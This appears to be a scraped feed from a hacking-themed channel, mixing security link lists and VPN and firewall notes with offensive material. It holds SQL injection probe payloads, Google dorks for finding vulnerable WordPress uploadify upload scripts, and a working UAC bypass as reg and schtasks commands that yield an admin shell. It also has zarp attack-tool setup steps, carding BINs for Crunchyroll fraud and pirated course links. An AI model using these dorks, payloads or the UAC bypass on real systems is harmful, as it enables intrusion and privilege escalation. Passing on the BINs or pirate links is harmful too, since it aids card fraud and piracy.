▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑#Popular Testing Methodes & tools 2020 for apps-servers :


#Javascript Tools

* [Retire.js](https://retirejs.github.io/retire.js)

#Popular Commercial Tools

* [Qualys Web Scanning](https://www.qualys.com/apps/web-app-scanning/)
* [IBM Security AppScan](https://www.ibm.com/security/application-security/appscan)

#XSS - Cross-Site Scripting

- [Cross-Site Scripting – Application Security – Google](https://www.google.com/intl/sw/about/appsecurity/learning/xss/) - Introduction to XSS by [Google](https://www.google.com/).

- [H5SC](https://github.com/cure53/H5SC) - HTML5 Security Cheatsheet - Collection of HTML5 related XSS attack vectors by [@cure53](https://github.com/cure53).

- [XSS.png](https://github.com/jackmasa/XSS.png) - XSS mind map by [@jackmasa](https://github.com/jackmasa).

- [EXCESS-XSS Guide](https://excess-xss.com/) - Comprehensive tutorial on cross-site scripting by [@JakobKallin](https://github.com/JakobKallin) and [Irene Lobo Valbuena](https://www.linkedin.com/in/irenelobovalbuena/).

✅ git sources
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑#SQL Injection for beginers best 2020 resources :

- [SQL Injection Cheat Sheet](https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/) - Written by [@netsparker](https://twitter.com/netsparker).

- [SQL Injection Wiki](https://sqlwiki.netspi.com/) - Written by [NETSPI](https://www.netspi.com/).

- [SQL Injection Pocket Reference](https://websec.ca/kb/sql_injection) -

@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

Wix Web Designing and Development Beginner to Pro —1.89 GB

https://www.udemy.com/course/wix-web-designing-and-development-beginner-to-pro/

https://mega.nz/folder/GDxVzCBZ#yxMpLYg4eFL8KmITx9g9uw

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑#ORM Injection best 2020 Learning free practical resources :

- [HQL for pentesters](http://blog.h3xstream.com/2014/02/hql-for-pentesters.html) -

- [HQL : Hyperinsane Query Language (or how to access the whole SQL API within a HQL injection ?)](https://www.synacktiv.com/ressources/hql2sql_sstic_2015_en.pdf) - Written by [@_m0bius](https://twitter.com/_m0bius).

- [ORM2Pwn: Exploiting injections in Hibernate ORM](https://www.slideshare.net/0ang3el/orm2pwn-exploiting-injections-in-hibernate-orm)

- [ORM Injection](https://www.slideshare.net/simone.onofri/orm-injection)


@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑WHAT IS ORM INJECTIONS & How & Why to USE ?

1️⃣ Object Relational Mapping (ORM) Injection is an attack using SQL Injection against an ORM generated data access object model. ... ORM generated objects can use SQL or in some cases, a variant of SQL, to perform CRUD (Create, Read, Update, Delete) operations on a database

2️⃣ How to Test ?

> ORM layers can be prone to vulnerabilities, as they extend the surface of attack. Instead of directly targeting the application with SQL queries, you’d be focusing on abusing the ORM layer to send malicious SQL queries.

3️⃣ Identify the ORM Layer :

> To effeciently test and understand what’s happening between your requests and the backend queries, and as with everything related to conducting proper testing, it is essential to identify the technology being used. By following the information gathering chapter, you should be aware of the technology being used by the application at hand. Check this list mapping languages to their respective ORMs.

4️⃣ Abusing the ORM Layer

After identifying the possible ORM being used, it becomes essential to understand how its parser is functioning, and study methods to abuse it, or even maybe if the application is using an old version, identify CVEs pertaining to the library being used. Sometimes, ORM layers are not properly implemented, and thus allow for the tester to conduct normal SQL Injection, without worrying about the ORM layer.

5️⃣Weak ORM Implementation :

1) A vulnerable scenario where the ORM layer was not implemented properly, taken from SANS:

> List results = session.createQuery("from Orders as orders where orders.id = " + currentOrder.getId()).list();
List results = session.createSQLQuery("Select * from Books where author = " + book.getAuthor()).list();
The above didn’t implement the positional parameter, which allows the developer to replace the input with a ?. An example would be as such:

2) Query hqlQuery = session.createQuery("from Orders as orders where orders.id = ?");
List results = hqlQuery.setString(0, "123-ADB-567-QTWYTFDL").list(); // 0 is the first position, where it is dynamically replaced by the string set
This implementation leaves the validation and sanitization to be done by the ORM layer, and the only way to bypass it would be by identifying an issue with the ORM layer.

Powered by wiki
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Vulnerable ORM Layer

 "ORM layers are code, third-party libraries most of the time. They can be vulnerable just like any other piece of code. One example could be the sequelize ORM npm library which was found to be vulnerable in 2019. In another research done by RIPS Tech, bypasses were identified in the hibernate ORM used by Java.> 

wiki

🦑A cheat sheet that could allow the tester to identify issues could be outlined as follows:


1️⃣MySQL abc\' INTO OUTFILE --

2️⃣PostgreSQL $$='$$=chr(61)||chr(0x27) and 1=pg_sleep(2)||version()'

3️⃣Oracle NVL(TO_CHAR(DBMS_XMLGEN.getxml('select 1 where 1337>1')),'1')!='1'

4️⃣MS SQL 1<LEN(%C2%A0(select%C2%A0top%C2%A01%C2%A0name%C2%A0from%C2%A0users)

@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Wordpress uploadify Dorks Priv8 ☠️:

inurl:/wp-content/plugins/chillybin-competition/js/uploadify/uploadify.php
inurl:/wp-content/plugins/comments_plugin/uploadify/uploadify.php
inurl:/wp-content/plugins/wp-crm/third-party/uploadify/uploadify.php
inurl:/wp-content/plugins/doptg/libraries/php/uploadify.php
inurl:/wp-content/plugins/pods/js/uploadify.php
inurl:/wp-content/plugins/wp-property/third-party/uploadify/uploadify.php
inurl:/wp-content/plugins/qr-color-code-generator-basic/QR-Color-Code-Generator/uploadify/uploadify.php
inurl:/wp-content/plugins/wp-symposium/uploadify/uploadify.php
inurl:/wp-content/plugins/uploader/uploadify.php
inurl:/wp-content/plugins/1-flash-gallery/upload.php
inurl:/wp-content/themes/zcool-like/uploadify.php
inurl:/third-party/uploadify/uploadify.php
inurl:/lib/uploadify/custom.php
inurl:/wp-content/plugins/html5avmanager/lib/uploadify/custom.php
inurl:/wp-content/plugins/wp-property/third-party/uploadify/uploadify.php
inurl:/wp-content/plugins/squace-mobile-publishing-plugin-for-*********/uploadify.php
inurl:/wp-content/plugins/1-flash-gallery/js/uploadify/uploadify.php
inurl:/wp-content/themes/aim-theme/lib/js/old/uploadify.php
inurl:/wp-content/plugins/uploadify/includes/process_upload.php
inurl:/wp-content/plugins/very-simple-post-images/uploadify/uploadify.php
inurl:/wp-content/themes/pronto/cjl/pronto/uploadify/check.php
inurl:/wp-content/plugins/annonces/includes/lib/uploadify/uploadify.php
inurl:/wp-content/plugins/apptivo-business-site/inc/jobs/files/uploadify/uploadify.php
inurl:/wp-content/plugins/bulletproof-security/admin/uploadify/uploadify.php

✅ darkwiki sources
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Exploiting Environment Variables in Scheduled Tasks for UAC Bypass
The Windows Task Scheduler

ADVANTAGES :

1️⃣this a great place to go and find privilege escalations, it's typically abused to add SUID style capabilities to Windows in a nice easy to misunderstand package.

2️⃣It can execute programs as LocalSystem, it can auto-elevate applications for UAC, it can even host arbitrary COM objects.

3️⃣All in all it's a mess, which is why finding bugs in the scheduler itself or in the tasks isn't especially difficult. For example here's a few I've found before. This short blog is about a quick and dirty UAC bypass I discovered which works silently even with UAC is set to the highest prompt level and can be executed without dropping any files (other that a registry key) to disk.

🦑 Let's dump some of the task's properties using Powershell to find out.

1) We can see the Principal property, which determines what account the task runs as and the Actions property which determines what to run. I


2) n the Principal property we can see the Group to run as is Authenticated Users which really means it will run as the logged on user starting the task. We also see the RunLevel is set to Highest which means the Task Scheduler will try and elevate the task to administrator without any prompting.


3) Now look at the actions, it's specifying a path, but notice something interesting? It's using an environment variable as part of the path, and in UAC scenarios these can be influenced by a normal user by writing to the registry key


> HKEY_CURRENT_USER\Enviroment and specifying a REG_SZ value.

4) So stop beating around the bush, let's try and exploit it. I dropped a simple executable to c:\dummy\system32\cleanmgr.exe, set the windir environment variable to


> c:\dummy and started the scheduled task


5) immediately get administrator privileges. So let's automate the process, I'll use everyone's favourite language, BATCH as we can use the reg and schtasks commands to do all the work we need. Also as we don't want to drop a file to disk we can abuse the fact that the executable path isn't quoted by the Task Scheduler, meaning we can inject arbitrary command line arguments and just run a simple CMD shell.

> reg add hkcu\Environment /v windir /d "cmd /K reg delete hkcu\Environment /v windir /f && REM "
schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I

6) The BATCH file first sets the windir environment variable to "cmd /K" with a following script which deletes the original windir enviroment variable then uses REM to comment the rest of the line out.

7) Executing this on Windows 10 Anniversary Edition and above as a split token admin will get you a shell running as an administrator. I've not tested it on any earlier versions of Windows so YMMV.


8) didn't send this to MSRC but through a friend confirmed that it should already be fixed in a coming version of RS3, so it really looks like MS are serious about trying to lock UAC back down, at least as far as it can be

9) If you want to mitigate now you should be able to reconfigure the task to not use environment variables using the following Powershell script run as administrator (doing this using the UAC bypass is left as an exercise for reader).

$action = New-ScheduledTaskAction -Execute $env:windir\System32\cleanmgr.exe -Argument "/autoclean /d $env:systemdrive"
Set-ScheduledTask SilentCleanup -TaskPath \Microsoft\Windows\DiskCleanup -Action $action


10) If you want to find other potential candidates the following Powershell script will find all tasks with
executable actions which will auto elevate. On my system there are 4 separate tasks, but only one (the SilentCleanup task) can be executed as a normal user, so the rest are not exploitable. Good thing I guess.

> $tasks = Get-ScheduledTask |
Where-Object { $_.Principal.RunLevel -ne "Limited" -and
$_.Principal.LogonType -ne "ServiceAccount" -and
$_.State -ne "Disabled" -and
$_.Actions[0].CimClass.CimClassName -eq "MSFT_TaskExecAction" }

powered by wikisources
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

Find Exploit written guide

🦑 x2 ✅ Bins For Crunchyroll Premium

BIN : 51056626645xxxxx
BIN : 51056650173xxxxx

Date: GEN
CVV: GEN
IP: USA
CP: 10080

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Top #Networking(+vpn config) new resources :


#Cisco ASA IPsec VPN

- ASA IKEv2 RA VPN With Windows or Android VPN Clients and Certificate Authentication Configuration


#Additional GET VPN Resources

- GETVPN Deployment Guide

- GETVPN Sample Configurations

#IKEv2 :

- Configuring IKEv2 VRF aware SVTI

@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Firepower Threat Defense Site-to-site VPN Guidelines and Limitations :

1) A VPN connection can only be made across domains by using an extranet peer for the endpoint not in the current domain.

2) A VPN topology cannot be moved between domains.

3) Network objects with a 'range' option are not supported in VPN

4) Firepower Threat Defense VPNs are only be backed up using the Firepower Management backup.

5) The Firepower Threat Defense VPNs do not currently support PDF export and policy comparison.

6) There is no per-tunnel or per-device edit option for Firepower Threat Defense VPNs, only the whole topology can be edited.

7) Device interface address verification will not be performed for Transport mode when Crypto ACL is selected.

8) All nodes in a topology must be configured with either Crypto ACL or Protected Network. A topology may not be configured with Crypto ACL on one node and Protected Network on another.

9) There is no support for automatic mirror ACE generation. Mirror ACE generation for the peer is a manual process on either side.

10) While using Crypto ACL, there is no support for tunnel health events for VPN topologies. With Crypto ACL, there is no support for Hub, Spoke, and Full Mesh topologies; only point to point VPN is supported.

11) Whenever IKE ports 500/4500 are in use or when there are some PAT translations that are active, the Site-to-Site VPN cannot be configured on the same ports as it fails to start the service on those ports.

12) Tunnel status is not updated in realtime, but at an interval of 5 minutes in the Firepower Management Center.

13) The character " (double quote) is not supported as part of pre-shared keys. If you have used " in a pre-shared key, ensure that you change the character after you upgrade to Firepower Threat Defense 6.30.

> vpnconfig source
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Network Attack Tool-any Linux :

🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽 :


1️⃣ Enter the following commands on Terminal to download and install zarp:

- git clone https://github.com/hatRiot/zarp (Download zarp)
-cd zarp
-pip install -r requirements.txt (Install the required modules)
-python zarp.py

2️⃣bryan@devbox:~/zarp$ sudo ./zarp.py --help


3️⃣ Choose options via numbers :

1 Poisoners 5 Parameter
2 DoS Attacks 6 Services
3 Sniffers 7 Attacks
4 Scanners 8 Sessions

 FOR LEARNING ONLY !!!

@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑#Resources about Zone-based Firewalls

#Deployment and Configuration Guides :


- Security Configuration Guide: Zone-Based Policy Firewall

- Zone-Based Policy Firewall Design and Application Guide

- Configuring ZBFW from GeeksforGeeks


LEARN BEFORE BREAK

@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

Data Acquisition with LabVIEW —763 MB—small test !

https://mega.nz/folder/LSY3RIQZ#o7AJqxxrKzUdNSrMeXJEqQ

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑#Rules For Applying Zone-Based Policy Firewall !!


- Router network interfaces’ membership in zones is subject to several rules that govern interface behavior, as is the traffic moving between zone member interfaces:
- A zone must be configured before interfaces can be assigned to the zone.
- An interface can be assigned to only one security zone.
- All traffic to and from a given interface is implicitly blocked when the interface is assigned to a zone, except traffic to and from other interfaces in the same zone, and traffic to any interface on the router.
- Traffic is implicitly allowed to flow by default among interfaces that are members of the same zone.
- In order to permit traffic to and from a zone member interface, a policy allowing or inspecting traffic must be configured between that zone and any other zone.
- The self zone is the only exception to the default deny all policy. All traffic to any router interface is allowed until traffic is explicitly denied.
- Traffic cannot flow between a zone member interface and any interface that is not a zone member. Pass, inspect, and drop actions can only be applied between two zones.
- Interfaces that have not been assigned to a zone function as classical router ports and might still use classical stateful inspection/CBAC configuration.
- If it is required that an interface on the box not be part of the zoning/firewall policy. It might still be necessary to put that interface in a zone and configure a pass all policy (sort of a dummy policy) between that zone and any other zone to which traffic flow is desired.
- From the preceding it follows that, if traffic is to flow among all the interfaces in a router, all the interfaces must be part of the zoning model (each interface must be a member of one zone or another).
- The only exception to the preceding deny by default approach is the traffic to and from the router, which will be permitted by default. An explicit policy can be configured to restrict such traffic.

> git sources
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁